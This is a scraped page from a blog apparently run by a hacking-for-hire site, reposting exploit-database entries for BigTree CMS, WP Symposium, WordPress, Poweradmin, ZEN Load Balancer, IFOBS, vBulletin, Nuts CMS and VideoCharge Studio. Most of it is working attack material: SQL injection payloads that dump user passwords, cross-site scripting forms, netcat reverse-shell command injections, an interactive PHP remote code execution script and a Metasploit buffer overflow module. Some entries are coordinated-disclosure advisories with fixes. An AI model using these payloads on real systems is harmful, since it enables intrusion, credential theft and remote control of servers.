Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863153232

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
BigTree CMS 4.2.3: Multiple SQL Injection Vulnerabilities
Security Advisory – Curesec Research Team

Online-Reference:
http://blog.curesec.com/article/blog/BigTree-CMS-423-Multiple-SQL-Injection-Vulnerabilities-39.html

1. Introduction

Affected Product:   BigTree CMS 4.2.3  
Fixed in:     4.2.4
Fixed Version Link:
https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip  
Vendor Contact:   contribute@bigtreecms.org  
Vulnerability Type:   Multiple SQL Injections  
Remote Exploitable:   Yes  
Reported to vendor:   07/07/2015  
Disclosed to public:   08/07/2015  
Release mode:     Coordinated release  
CVE:       n/a  
Credits     Tim Coen of Curesec GmbH  

2. Vulnerability Description

Various components of the admin area of the BigTree CMS are vulnerable
to SQL injection, which can lead to data leaks as well as compromisation
of the host.

Please note that you have to be authenticated to exploit this issue.

SQL Injection 1

The script that processes page view requests passes the "id" GET request
value to functions which put this value directly into SQL queries. No
prepared statements or escaping is used, thus opening it up to SQL
injection.

Proof of Concept (Show all BigTree users):


http://localhost//BigTree-CMS/site/index.php/admin/pages/view-tree/0'
union all select 1,concat(email, ":", password),3,4,5,6,7,8,9,10 from
bigtree_users %23/

Code:

        core/admin/modules/pages/view-tree.php:151; page id is user
controlled
          $nav_visible =
array_merge($admin->getNaturalNavigationByParent($page["id"],1),$admin->getPendingNavigationByParent($page["id"]));
          $nav_hidden =
array_merge($admin->getHiddenNavigationByParent($page["id"]),$admin->getPendingNavigationByParent($page["id"],""));
          $nav_archived = $admin->getArchivedNavigationByParent($page["id"]);

        core/inc/bigtree/admin.php:2638
        static function getArchivedNavigationByParent($parent) {
                [...]
          $q = sqlquery("SELECT id,nav_title as
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND archived = 'on' ORDER BY
nav_title asc");

        core/inc/bigtree/admin.php:3167
        static function getHiddenNavigationByParent($parent) {
                [...]
          $q = sqlquery("SELECT id,nav_title as
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND in_nav = '' AND archived
!= 'on' ORDER BY nav_title asc");

        core/inc/bigtree/admin.php:3758
        static function getNaturalNavigationByParent($parent,$levels = 1) {
                [...]
          $q = sqlquery("SELECT id,nav_title AS
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND in_nav = 'on' AND
archived != 'on' ORDER BY position DESC, id ASC");

        core/inc/bigtree/admin.php:4531
        static function getPendingNavigationByParent($parent,$in_nav = true) {
                [...]
          $q = sqlquery("SELECT * FROM bigtree_pending_changes WHERE
pending_page_parent = '$parent' AND `table` = 'bigtree_pages' AND type =
'NEW' ORDER BY date DESC");

SQL Injection 2

When creating a new user, the email address is not checked server side,
so it is possible to set it to anything.

When logging in, the email address is saved in the session, and later
used to retrieve user data. This happens without prepared statements,
thus opening the query up to SQL injection.

Proof of Concept:


1. Create User
f'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10%23bar@example.com
2. Log in
3. result can be seen in multiple places

Code:

    core/inc/bigtree/admin.php:81
        $f = sqlfetch(sqlquery("SELECT * FROM bigtree_users WHERE id =
'".$_SESSION["bigtree_admin"]["id"]."' AND email =
'".$_SESSION["bigtree_admin"]["email"]."'"));

SQL Injection 3 (Blind)

The function used to calculate the SEO score of a post for Ajax requests
passes unsanitized user input to a function performing the actual
computation. This function does not use prepared statements, thus
opening it up to SQL injection. The result of the query is never echoed
to the end user, making this a blind SQL injection.

Proof of Concept:



http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
        POST: content=foo&resources=bar&id=foo' or 1=2%23&title=Trees of
All Sizes


http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
        POST: content=foo&resources=bar&id=foo' or 1=1%23&title=Trees of
All Sizes

Code:

        core/admin/ajax/pages/get-seo-score.php:4:  
            $seo = $admin->getPageSEORating($_POST,$_POST["resources"]);

        core/inc/bigtree/admin.php:4222
            static function getPageSEORating($page,$content) {
                    [...]
              if ($page["title"]) {
                $score += 5;
                // They have a title, let's see if it's unique
                $r = sqlrows(sqlquery("SELECT * FROM bigtree_pages WHERE
title = '".sqlescape($page["title"])."' AND id != '".$page["id"]."'"));

3. Solution

To mitigate this issue please upgrade at least to version 4.2.3:

https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip

Please note that a newer version might already be available.

4. Report Timeline

07/07/2015   Informed Vendor about Issue
07/08/2015   Vendor send Fixes for confirmation
07/10/2015   Fixes Confirmed
07/26/2015   Vendor releases Version 4.2.3
08/07/2015   Disclosed to public
HireHackking 
Details
================
Software: WP Symposium
Version: 15.1
Homepage: https://wordpress.org/plugins/wp-symposium
Advisory report: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
CVE: Awaiting assignment
CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:P)

Description
================
Blind SQL Injection in WP Symposium allows unauthenticated attackers to access sensitive data

Vulnerability
================
An unauthenticated user can run blind sql injection of the site and extract password hashes and other information from the database.

Proof of concept
================
Perform the following POST to a site with the plugin installed. The request will take over 5 seconds to respond:
POST /wordpress/wp-content/plugins/wp-symposium/ajax/forum_functions.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/wordpress/
Content-Length: 51
Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1421717320
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=getTopic&topic_id=1 AND SLEEP(5)&group_id=0
 

Mitigations
================
Upgrade to version 15.8 or later

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================
2015-03-02: Discovered
2015-07-14: Reported to simon@wpsymposium.com
2015-07-14: Requested CVE
2015-08-07: Vendor confirmed fixed in version 15.8
2015-08-10: Published


Discovered by dxw:
================
Glyn Wintle
Please visit security.dxw.com for more information.
HireHackking 
# Exploit Title: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability
# Date: 2015-07-30
# Exploit Author: PizzaHatHacker
# Vendor Homepage: http://www.wpsymposium.com/
# Version: ? <= version <= 15.5.1
# Contact: PizzaHatHacker[a]gmail[.]com
# Tested on: Apache / WordPress 4.2.3 / wp-symposium 15.5.1
# CVE: 
# Category: remote

1. Product Description
Extract from the plugin page :
"WP Symposium turns a WordPress website into a Social Network! It is a WordPress plugin that provides a forum, activity (similar to Facebook wall), member directory, private mail, notification panel, chat windows, profile page, social widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook Connect and Mobile support! You simply choose which you want to activate! Certain features are optional to members to protect their privacy."

2. Vulnerability Description & Technical Details
Wordpress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an unauthenticated SQL Injection in get_album_item.php parameter 'size'.
The issue is exploitable even if the plugin is deactivated.

3. Impact Analysis :

The SQL injection allows (very easily) to retrieve all the database content, which includes users details and password hashes. An attacker may be able to crack users' password hashes and log in as them. If an administrator user password is obtained, then the attacker could take complete control of the Wordpress installation. Collected information may also allow further attacks.

4. Common Vulnerability Scoring System
* Exploitability Metrics
- Access Vector (AV) : Network (AV:N)
- Access Complexity (AC) : Low (AC:L)
- Authentication (Au) : None (Au:N)

* Impact Metrics
- Confidentiality Impact (C) : Partial (C:P)
- Integrity Impact (I) : Partial (I:P)
- Availability Impact (A) : Partial (A:P)

* CVSS v2 Vector (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVSS Base Score : 7.5
- Impact Subscore 6.4
- Exploitability Subscore 10

5. Proof of Concept

PoC URL : http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--
PoC Command (Unix) : wget "http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt

In the content of the HTTP response you will find the MySQL version, for example :
5.5.44-0+deb7u1

6. Vulnerability Timeline
2015-05    : Vulnerability identified
2015-07-30 : Vendor informed about this issue
2015-07-30 : Vendor confirms the issue
2015-08-04 : Ask for a delay to deploy the fix
2015-08-04 : Response : 1-2 days (needs testing)
2015-08-07 : Update to version 15.8 is available
2015-08-10 : Disclosure of this document (a diff on the patch will trivially reveal the issue)

7. Solution
Update Wordpress plugin wp-symposium to the latest version, which is 15.8 at the date I am writing this.

8. Personal Notes

I am not a security professional, just a fan of computer security.
If you have any questions/remarks, feel free to contact me.
I'm interesting in any discussion/advice/question/criticism about security/exploits/programming :-)
HireHackking

WordPress Core 3.4.2 - Multiple Path Disclosure Vulnerabilities

HACKER · %s · %s

source: https://www.securityfocus.com/bid/55597/info WordPress is prone to multiple path-disclosure vulnerabilities. Remote attackers can exploit these issues to obtain sensitive information that may lead to further attacks. WordPress 3.4.2 is vulnerable; other versions may also be affected. http://www.example.com/learn/t/wordpress/wp-includes/vars.php http://www.example.com/learn/t/wordpress/wp-includes/update.php http://www.example.com/learn/t/wordpress/wp-includes/theme.php http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/sidebar.php http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/header.php http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/footer.php http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/comments.php http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/comments-popup.php http://www.example.com/learn/t/wordpress/wp-includes/template-loader.php http://www.example.com/learn/t/wordpress/wp-includes/taxonomy.php http://www.example.com/learn/t/wordpress/wp-includes/shortcodes.php http://www.example.com/learn/t/wordpress/wp-includes/script-loader.php http://www.example.com/learn/t/wordpress/wp-includes/rss.php http:www.example.com/learn/t/wordpress/wp-includes/rss-functions.php http://www.example.com/learn/t/wordpress/wp-includes/registration.php http://www.example.com/learn/t/wordpress/wp-includes/registration-functions.php http://www.example.com/learn/t/wordpress/wp-includes/post.php http://www.example.com/learn/t/wordpress/wp-includes/post-template.php http://www.example.com/learn/t/wordpress/wp-includes/nav-menu-template.php http://www.example.com/learn/t/wordpress/wp-includes/ms-settings.php http://www.example.com/learn/t/wordpress/wp-includes/ms-functions.php http://www.example.com/learn/t/wordpress/wp-includes/ms-default-filters.php http://www.example.com/learn/t/wordpress/wp-includes/ms-default-constants.php http://www.example.com/learn/t/wordpress/wp-includes/media.php http://www.example.com/learn/t/wordpress/wp-includes/kses.php http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/config.php http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpell.php http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/GoogleSpell.php http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/EnchantSpell.php http://www.example.com/learn/t/wordpress/wp-includes/general-template.php http://www.example.com/learn/t/wordpress/wp-includes/functions.php http://www.example.com/learn/t/wordpress/wp-includes/feed-rss2.php http://www.example.com/learn/t/wordpress/wp-includes/feed-rss2-comments.php http://www.example.com/learn/t/wordpress/wp-includes/feed-rss.php http://www.example.com/learn/t/wordpress/wp-includes/feed-rdf.php http://www.example.com/learn/t/wordpress/wp-includes/feed-atom.php http://www.example.com/learn/t/wordpress/wp-includes/feed-atom-comments.php http://www.example.com/learn/t/wordpress/wp-includes/default-widgets.php http://www.example.com/learn/t/wordpress/wp-includes/default-filters.php http://www.example.com/learn/t/wordpress/wp-includes/comment-template.php http://www.example.com/learn/t/wordpress/wp-includes/class.wp-styles.php http://www.example.com/learn/t/wordpress/wp-includes/class.wp-scripts.php http://www.example.com/learn/t/wordpress/wp-includes/class-wp-xmlrpc-server.php http://www.example.com/learn/t/wordpress/wp-includes/class-wp-http-ixr-client.php http://www.example.com/learn/t/wordpress/wp-includes/class-snoopy.php http://www.example.com/learn/t/wordpress/wp-includes/class-feed.php http://www.example.com/learn/t/wordpress/wp-includes/category-template.php http://www.example.com/learn/t/wordpress/wp-includes/canonical.php http://www.example.com/learn/t/wordpress/wp-includes/author-template.php http://www.example.com/learn/t/wordpress/wp-includes/admin-bar.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/tag.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/single.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/sidebar.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/sidebar-footer.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/search.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/page.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/onecolumn-page.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-single.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-page.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-attachment.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/index.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/header.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/functions.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/footer.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/comments.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/category.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/author.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/attachment.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/archive.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/404.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/tag.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/single.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar-page.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar-footer.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/showcase.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/search.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/page.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/index.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/inc/widgets.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/inc/theme-options.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/image.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/functions.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/comments.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/category.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/author.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/archive.php http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/404.php http://www.example.com/learn/t/wordpress/wp-content/plugins/hello.php http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/widget.php http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/legacy.php http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/akismet.php http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/admin.php http://www.example.com/learn/t/wordpress/wp-admin/user/menu.php http://www.example.com/learn/t/wordpress/wp-admin/upgrade-functions.php http://www.example.com/learn/t/wordpress/wp-admin/options-head.php http://www.example.com/learn/t/wordpress/wp-admin/network/menu.php http://www.example.com/learn/t/wordpress/wp-admin/menu.php http://www.example.com/learn/t/wordpress/wp-admin/menu-header.php http://www.example.com/learn/t/wordpress/wp-admin/includes/user.php http://www.example.com/learn/t/wordpress/wp-admin/includes/upgrade.php http://www.example.com/learn/t/wordpress/wp-admin/includes/update.php http://www.example.com/learn/t/wordpress/wp-admin/includes/update-core.php http://www.example.com/learn/t/wordpress/wp-admin/includes/theme-install.php http://www.example.com/learn/t/wordpress/wp-admin/includes/template.php http://www.example.com/learn/t/wordpress/wp-admin/includes/schema.php http://www.example.com/learn/t/wordpress/wp-admin/includes/plugin.php http://www.example.com/learn/t/wordpress/wp-admin/includes/plugin-install.php http://www.example.com/learn/t/wordpress/wp-admin/includes/nav-menu.php http://www.example.com/learn/t/wordpress/wp-admin/includes/ms.php http://www.example.com/learn/t/wordpress/wp-admin/includes/misc.php http://www.example.com/learn/t/wordpress/wp-admin/includes/menu.php http://www.example.com/learn/t/wordpress/wp-admin/includes/media.php http://www.example.com/learn/t/wordpress/wp-admin/includes/list-table.php http://www.example.com/learn/t/wordpress/wp-admin/includes/file.php http://www.example.com/learn/t/wordpress/wp-admin/includes/dashboard.php http://www.example.com/learn/t/wordpress/wp-admin/includes/continents-cities.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-users-list-table.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-themes-list-table.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-theme-install-list-table.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-terms-list-table.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-posts-list-table.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-plugins-list-table.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-plugin-install-list-table.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-users-list-table.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-themes-list-table.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-sites-list-table.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-media-list-table.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-links-list-table.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ssh2.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ftpsockets.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ftpext.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-direct.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-comments-list-table.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-sockets.php http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-pure.php http://www.example.com/learn/t/wordpress/wp-admin/includes/admin.php http://www.example.com/learn/t/wordpress/wp-admin/admin-functions.php
HireHackking

Poweradmin - 'index.php' Cross-Site Scripting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/55619/info Poweradmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/index.php/%3E%22%3E%3CScRiPt%3Ealert%28415833140173%29%3C/ScRiPt%3E
HireHackking

ZEN Load Balancer - Multiple Vulnerabilities

HACKER · %s · %s

source: https://www.securityfocus.com/bid/55638/info ZEN Load Balancer is prone to the following security vulnerabilities: 1. Multiple arbitrary command-execution vulnerabilities 2. Multiple information-disclosure vulnerabilities 3. An arbitrary file-upload vulnerability An attacker can exploit these issues to execute arbitrary commands, upload arbitrary files to the affected computer, or disclose sensitive-information. ZEN Load Balancer 2.0 and 3.0 rc1 are vulnerable. http://www.example.com/index.cgi?id=2-2&filelog=%26nc+192.168.1.1+4444+-e+/bin/bash;&nlines=1&action=See+logs http://www.example.com/index.cgi?id=2-2&filelog=#&nlines=1%26nc+192.168.1.1+4444+-e+/bin/bash;&action=See+logs http://www.example.com/index.cgi?id=3-2&if=lo%26nc+192.168.1.1+4444+-e+/bin/bash%26&status=up&newip=0.0.0.0&netmask=255.255.255.0&gwaddr=&action=Save+%26+Up! http://www.example.com/config/global.conf http://www.example.com/backup/
HireHackking
source: https://www.securityfocus.com/bid/55577/info minimal Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. minimal Gallery 0.8.1 is vulnerable; other versions may also be affected. htp://www.example.com/index.php?c=[XSS] htp://www.example.com/PAth/index.php?s=[XSS] htp://www.example.com/PAth/index.php?s=y&id=[XSS] htp://www.example.com/PAth/index.php?m=[XSS] htp://www.example.com/PAth/index.php?d=[XSS]
HireHackking
source: https://www.securityfocus.com/bid/55561/info IFOBS is prone to multiple HTML-injection vulnerabilities. Exploiting these issues may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible. IFOBS XSS-1.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="secondName" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> IFOBS XSS-2.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="firstName" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> IFOBS XSS-3.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="thirdName" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> IFOBS XSS-4.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="BirthDay" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="BirthYear" value="2012"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> IFOBS XSS-5.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="BirthMonth" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="BirthYear" value="2012"> <input type="hidden" name="myaction" value="1"> </form> </body> </html>
HireHackking
source: https://www.securityfocus.com/bid/55589/info AxisInternet VoIP Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. AxisInternet VoIP Manager 2.1.5.7 is vulnerable; other versions may also be affected. https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=%22%3 %3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&department_match=1&action=Select https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=&lastname_match=1&firstname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&firstname_match=1&department=&department_match=1&action=Select https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&;lastname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select https://www.example.com/asterisk/contact_chooser.cgi?contact=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C https://www.example.com/asterisk/contacts.cgi?type=2&usr=demo-100&managed_usr=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select+
HireHackking

vBulletin 4.1.12 - 'blog_plugin_useradmin.php' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/55592/info VBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. VBulletin 4.1.12 is vulnerable; other versions may also be affected. http://www.example.com/includes/blog_plugin_useradmin.php?do=usercss&amp;u=[Sql]
HireHackking

Nuts CMS - PHP Remote Code Injection / Execution

HACKER · %s · %s

<?php # Nuts-CMS Remote PHP Code Injection / Execution 0day Exploit # # Nuts CMS is a content management system (CMS), which enables you to build Web sites and powerful online applications. # Nuts CMS is an open source solution that is freely available to everyone. # # Discovered by Yakir Wizman # Date 17/08/2015 # Vendor Homepage : http://www.nuts-cms.com/ # CVE : N/A # Description : Nuts CMS is vulnerable to php code injection due to improper input validation (CWE-20, https://cwe.mitre.org/data/definitions/20.html). ### # Exploit code: error_reporting(E_ALL); $error[0] = "[!] This script is intended to be launched from the cli."; if(php_sapi_name() <> "cli") die($error[0]); if($argc < 3) { echo("\nUsage : php {$argv[0]} <host> <path>"); echo("\nExample: php {$argv[0]} localhost /"); die(); } if(isset($argv[1]) && isset($argv[2])) { $host = $argv[1]; $path = $argv[2]; } $pack = "GET {$path}nuts/login.php?r=<?php+error_reporting(0);print(_nutCmsId_);system(base64_decode(\$_SERVER[HTTP_CMD]));die;+?> HTTP/1.0\r\n"; $pack.= "Host: {$host}\r\n"; $pack.= "Cmd: %s\r\n"; $pack.= "Connection: close\r\n\r\n"; while(1) { print "\nAnonymous@{$host}:~# "; if(($cmd = trim(fgets(STDIN))) == "exit") break; preg_match("/_nutCmsId_(.*)/s", http_send($host, sprintf($pack, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } function http_send($host, $pack) { if(!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}\n"); fwrite($sock, $pack); return stream_get_contents($sock); } ?>
HireHackking

VideoCharge Studio - Local Buffer Overflow (SEH) (Metasploit)

HACKER · %s · %s

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'VideoCharge Studio Buffer Overflow (SEH)', 'Description' => %q{ This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when processing a specially crafted .VSC file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of VideoCharge Studio to open a malicious .VSC file. }, 'License' => MSF_LICENSE, 'Author' => [ 'metacom', # Original discovery 'Andrew Smith', # MSF module 'Christian Mehlmauer' # MSF module ], 'References' => [ [ 'OSVDB', '69616' ], [ 'EBD', '29234' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process' }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x0a\x0d\x3c\x22\x26", 'DisableNops' => true, 'Space' => 2808 }, 'Targets' => [ [ 'VideoCharge Studio 2.12.3.685', { 'Ret' => 0x61B811F1, #p/p/r | zlib1.dll 'Offset' => 2184 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Oct 27 2013', 'DefaultTarget' => 0)) register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.vsc']),], self.class) end def exploit buffer = rand_text_alpha(target['Offset']) buffer << generate_seh_record(target.ret) buffer << payload.encoded file = %Q|<?xml version="1.0" encoding="Windows-1252" ?><config ver="2.12.3.685"> <cols name="Files"/> <cols name="Profiles"> <Property name="Profile"> <cols name="Formats"> <Property name="Stream"> <Value name="Name" type="8" value="#{buffer}"/> </Property> </cols> </Property> </cols> </config>| print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(file) end end
HireHackking

FTP Commander 8.02 - Overwrite (SEH)

HACKER · %s · %s

